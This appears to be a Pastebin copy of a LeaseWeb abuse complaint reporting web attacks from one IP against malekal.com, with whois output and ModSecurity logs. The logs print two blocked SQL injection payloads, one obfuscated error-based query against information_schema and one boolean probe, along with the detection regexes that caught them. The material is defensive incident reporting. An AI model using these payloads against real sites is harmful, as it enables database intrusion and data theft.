Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- We have received the abuse complaint regarding to the ATTACK. Please check it and take necessary actions on it.
- Thanks.
- ==========================================================
- ed e-mail to inform you of an abuse complaint **
- ABUSE TYPE: ATTACK
- IP: 85.17.73.12
- Dear customer,
- This message is to inform you we received a complaint regarding
- an IP assigned to you. Please see the complaint at the bottom
- of this e-mail. We urge you to take appropriate action to prevent
- future complaints.
- Please note: the complaint has been processed by an automated system.
- If you feel the complaint is invalid, please contact the complainant.
- Failure to take action might result in an IP block of the mentioned IP.
- Kind regards,
- LeaseWeb Netherlands B.V. - Abuse Desk
- ***** ADDITIONAL INFORMATION BY SIRT *****
- ******************************************
- ORIGINAL COMPLAINT BELOW
- ******************************************
- Hello,
- This is an automatically generated email,
- === Fri, 29 May 2015 20:38:50 +0200
- 9 attacks from 85.17.73.12 has been detected against malekal.com (94.23.44.69)
- More abuses for WYCT at : http://www.malekal.com/modsec/index.php?netname=WYCT
- abuse mail : abuse@leaseweb.com
- ===
- % This is the RIPE Database query service.
- % The objects are in RPSL format.
- %
- % The RIPE Database is subject to Terms and Conditions.
- % See http://www.ripe.net/db/support/db-terms-conditions.pdf
- % Note: this output has been filtered.
- % To receive output for a database update, use the "-B" flag.
- % Information related to '85.17.73.0 - 85.17.73.63'
- % Abuse contact for '85.17.73.0 - 85.17.73.63' is 'abuse@leaseweb.com'
- inetnum: 85.17.73.0 - 85.17.73.63
- netname: WYCT
- descr: Aysima 1-10-2009
- remarks: Please send email to "abuse@leaseweb.com" for complaints
- remarks: regarding portscans, DoS attacks and spam.
- country: NL
- admin-c: LSW1-RIPE
- tech-c: LSW1-RIPE
- status: ASSIGNED PA
- mnt-by: OCOM-MNT
- created: 2011-11-01T11:27:42Z
- last-modified: 2011-11-01T11:27:42Z
- source: RIPE # Filtered
- person: RIP Mean
- address: P.O. Box 93054
- address: 1090BB AMSTERDAM
- address: Netherlands
- phone: +31 20 3162880
- fax-no: +31 20 3162890
- abuse-mailbox: abuse@nl.leaseweb.com
- nic-hdl: LSW1-RIPE
- mnt-by: OCOM-MNT
- created: 2005-06-07T14:36:03Z
- last-modified: 2015-03-24T09:01:24Z
- source: RIPE # Filtered
- % Information related to '85.17.0.0/16AS16265'
- route: 85.17.0.0/16
- descr: LEASEWEB
- origin: AS16265
- remarks: LeaseWeb
- mnt-by: OCOM-MNT
- created: 2005-03-12T22:19:17Z
- last-modified: 2007-07-10T14:06:02Z
- source: RIPE # Filtered
- % Information related to '85.17.0.0/16AS60781'
- route: 85.17.0.0/16
- descr: LEASEWEB
- origin: AS60781
- remarks: LeaseWeb
- mnt-by: OCOM-MNT
- created: 2014-03-11T15:21:15Z
- last-modified: 2014-03-11T15:21:15Z
- source: RIPE # Filtered
- % This query was served by the RIPE Database Query Service version 1.79.2 (DB-4)
- Some logs for 85.17.73.12
- ========================================
- Matched Transaction for Search String (85.17.73.12)
- ========================================
- ========================================
- Matched Transaction for Search String (29/May/2015)
- ========================================
- --838f666c-A--
- [29/May/2015:20:34:53 +0200] VWixTV4XLEUAACR1eK4AAAAB 94.23.44.69 7399 94.23.44.69 8080
- --838f666c-B--
- POST /modsec/index.php?ip=(%2f**%2fsElEcT+1+%2f**%2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2fuNhEx(%2f**%2fhEx(%2f**%2fcOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRoUp%2f**%2fbY+x)a) HTTP/1.1
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
- Referer: http://www.malekal.com/modsec/index.php?ip=(%2f**%2fsElEcT+1+%2f**%2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2fuNhEx(%2f**%2fhEx(%2f**%2fcOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRoUp%2f**%2fbY+x)a)
- Content-Type: application/x-www-form-urlencoded
- Host: www.malekal.com
- Content-Length: 0
- X-Forwarded-For: 85.17.73.12
- Accept-Encoding: gzip
- X-Varnish: 2014342074
- --838f666c-C--
- --838f666c-F--
- HTTP/1.1 403 Forbidden
- Vary: Accept-Encoding
- Content-Encoding: gzip
- Content-Length: 186
- Content-Type: text/html; charset=iso-8859-1
- --838f666c-E--
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>403 Forbidden</title>
- </head><body>
- <h1>Forbidden</h1>
- <p>You don't have permission to access /modsec/index.php
- on this server.</p>
- </body></html>
- --838f666c-H--
- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\A|[^\\d])0x[a-f\\d]{3,}[a-f\\d]*)+" at ARGS:ip. [file "/etc/modsecurity/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21 found within ARGS:ip: (/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT /**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21)))) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a)"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]
- Action: Intercepted (phase 2)
- Apache-Handler: application/x-httpd-php
- Stopwatch: 1432924493439313 2606 (- - -)
- Stopwatch2: 1432924493439313 2606; combined=515, p1=131, p2=185, p3=0, p4=0, p5=169, sr=29, sw=30, l=0, gc=0
- Response-Body-Transformed: Dechunked
- Producer: ModSecurity for Apache/2.6.6 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
- Server: Apache/2.2.22
- --838f666c-Z--
- ========================================
- Matched Transaction for Search String (85.17.73.12)
- ========================================
- ========================================
- Matched Transaction for Search String (29/May/2015)
- ========================================
- --838f666c-A--
- [29/May/2015:20:34:53 +0200] VWixTV4XLEUAACR1eK8AAAAB 94.23.44.69 7399 94.23.44.69 8080
- --838f666c-B--
- POST /modsec/index.php?ip='0=A+and+1=1 HTTP/1.1
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
- Referer: http://www.malekal.com/modsec/index.php?ip='0=A+and+1=1
- Content-Type: application/x-www-form-urlencoded
- Host: www.malekal.com
- Content-Length: 0
- X-Forwarded-For: 85.17.73.12
- Accept-Encoding: gzip
- X-Varnish: 2014342075
- --838f666c-C--
- --838f666c-F--
- HTTP/1.1 403 Forbidden
- Vary: Accept-Encoding
- Content-Encoding: gzip
- Content-Length: 186
- Content-Type: text/html; charset=iso-8859-1
- --838f666c-E--
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>403 Forbidden</title>
- </head><body>
- <h1>Forbidden</h1>
- <p>You don't have permission to access /modsec/index.php
- on this server.</p>
- </body></html>
- --838f666c-H--
- Message: Access denied with code 403 (phase 2). Pattern match "(?i)\\b(?i:and)\\b\\s+(\\d{1,10}|'[^=]{1,10}')\\s*?[=]|\\b(?i:and)\\b\\s+(\\d{1,10}|'[^=]{1,10}')\\s*?[<>]|\\band\\b ?(?:\\d{1,10}|[\\'\"][^=]{1,10}[\\'\"]) ?[=<>]+|\\b(?i:and)\\b\\s+(\\d{1,10}|'[^=]{1,10}')" at ARGS:ip. [file "/etc/modsecurity/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: and 1= found within ARGS:ip: '0=A and 1=1"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]
- Action: Intercepted (phase 2)
- Apache-Handler: application/x-httpd-php
- Stopwatch: 1432924493554446 2160 (- - -)
- Stopwatch2: 1432924493554446 2160; combined=381, p1=120, p2=112, p3=0, p4=0, p5=113, sr=30, sw=36, l=0, gc=0
- Response-Body-Transformed: Dechunked
- Producer: ModSecurity for Apache/2.6.6 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
- Server: Apache/2.2.22
- --838f666c-Z--
- ========================================
- Matched Transaction for Search String (85.17.73.12)
- ========================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement